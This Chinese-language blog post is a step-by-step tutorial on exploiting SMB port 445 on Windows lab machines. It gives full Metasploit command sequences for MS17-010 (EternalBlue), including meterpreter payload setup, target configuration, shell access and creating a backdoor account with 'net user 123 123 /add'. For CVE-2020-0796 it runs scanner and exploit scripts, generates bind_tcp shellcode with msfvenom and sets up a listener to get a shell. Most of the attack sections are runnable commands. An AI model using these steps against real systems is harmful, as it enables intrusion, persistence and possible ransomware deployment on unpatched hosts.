资讯专栏INFORMATION COLUMN

漏洞利用三:445端口漏洞利用

lifefriend_007 / 5044人阅读

摘要:二永恒之蓝基于的漏洞,和最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受蠕虫型攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。

445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。

靶机:win7系统       IP:10.0.0.199           提前关闭靶机防火墙

一、MS17-010       永恒之蓝

MS微软,17年,10号漏洞。即新闻上报道的比特币勒索病毒。

1.进入MSF控制台:msfconsole

2.找到要利用的漏洞输入编号(search命令):search ms17-010

3.查看组件列表,选择要利用的攻击项(use命令):use 0

4.以为此处提示需要配置Payload,所以按照提示,Tab键一次是补全,两次是出来配置菜单。

配置攻击payload:       set payload windows/x64/meterpreter/(两次tab)

(此处Payload设置为tcp的反向连接)

5.查看模块配置信息(带Yes的是需要配置的):命令:show options

查看能攻击哪些系统命令:info

需要配置的内容:本地主机IP:LHOST,攻击的靶机IP:RHOSTS。

5.配置(set命令):

set rhosts 10.0.0.199

  

返回上级:back

6.开始攻击(exploit命令): exploit

7.攻击成功后提示建立会话。

“?”可查看攻击项目

例:shell命令进入对方命令行。

此时可在入侵界面操作命令:如创建用户    net user 123 123 /add

同时win7靶机上显示创建用户成功。

二、CVE-2020-0796         永恒之蓝2.0

基于SMBv3的漏洞,Windows 8和Windows Server 2012-Windows 10 最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受‘蠕虫型’攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。提权后可以做任意操作,例如加密你的文件勒索你。比如说像 EternalBlue 1.0(永恒之蓝 1.0)一样,加密文件,对你进行勒索虚拟货币。 

1.准备

靶机:win10               IP:10.0.0.171

2.攻击

下载插件

将插件传入kali系统mnt文件夹下

在kali主机输入命令:python3 scanner.py 10.0.0.171

表示Win10中存在该漏洞。

下载另一个插件

将插件传入kali的mnt文件夹下

在kali上输入命令:python3 CVE-2020-0796.py 10.0.0.171

结果出现蓝屏

3.第三个工具

(1)msfvenom生成正向连接木马(只支持正向连接,不支持反向)

(有关msfvenom详细使用可参考https://www.jianshu.com/p/dee2b171a0a0)

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b "/x00" -i 1 -f python

用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)

(2)打开kali另一个xshell界面,在msfconsole下:开启msf监听

use exploit/multi/handler

因为是反向shell,所以改为正向

set payload windows/x64/meterpreter/bind_tcp

set lport 4444                                                              //监听端口

set rhost 10.0.0.171                                                   //目标主机

(3)运行exploit.py脚本,反弹shell。切换回第一个xshell界面。运行第一步修改好的脚本

 此时得到了shell

如执行增加用户命令:

net user 123 123 /add

此时win10增加了一个123用户(密码123)。

三、MS08-067            网络服务器攻击

同理,不再赘述。

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/119188.html

相关文章

  • 使用cs与msf进行内网横向移动

    摘要:使用与进行内网横向移动目标系统为跳板主机为一,使用探测内网,将目标上线至,使用探测内网信息查看当前目标系统网络情况,确认目标系统所在内网网段,使用的功能对内网进行扫描可以看到目标开放了端口二,内网横向移动对当前目标系 ...

    luffyZh 评论0 收藏0
  • 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    摘要:利用永恒之蓝对进行攻击环境搭建,其中为靶机。命令有很多,想使用什么命令可以百度,我这里使用一些进行演示的命令就可以了。一般权限不够命令无法执行,这里简单介绍提权,提权方法百度多的很。至此本次利用永恒之蓝攻击漏洞拿到权限结束。 ...

    不知名网友 评论0 收藏0
  • Eternal Blue永恒之蓝漏洞利用--洪水猛兽

    摘要:永恒之蓝漏洞利用漏洞介绍什么是永恒之蓝漏洞恶意代码利用系统的漏洞可以获取系统最高权限。师傅们扫描开放文件及打印机共享端口的服务器,对该漏洞进行利用后无需用户任何操作,只要开机上网,即可向目标靶机植入远程控制木马,恶意插件等。 ...

    lijy91 评论0 收藏0
  • 漏洞利用六:Linux系统漏洞利用

    摘要:攻击机,成功后可在本地直接输入命令操控对方。在有些脚本的设计中,数据是通过环境变量来传递的,这样就给了数据提供者利用漏洞的机会。准备环境靶机系统,。 准备:直接用一个工具包,在虚拟机上直接打开Linux环境。此虚拟机为靶机。 账号:msfadmin        密码:msfadmin  ...

    KunMinX 评论0 收藏0
  • 渗透测试常见面试题总结

    摘要:渗透攻击渗透攻击是指有攻击者或渗透测试者利用一个系统应用或服务中的安全漏洞,所进行的攻击行为。是指在渗透攻击时作为攻击载荷运行的一组机器指令。 域 将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域,域是组织与存储资源的核心管理单元,在域中,至少有一台域控制器...

    不知名网友 评论0 收藏0

发表评论

0条评论

最新活动
阅读需要支付1元查看
<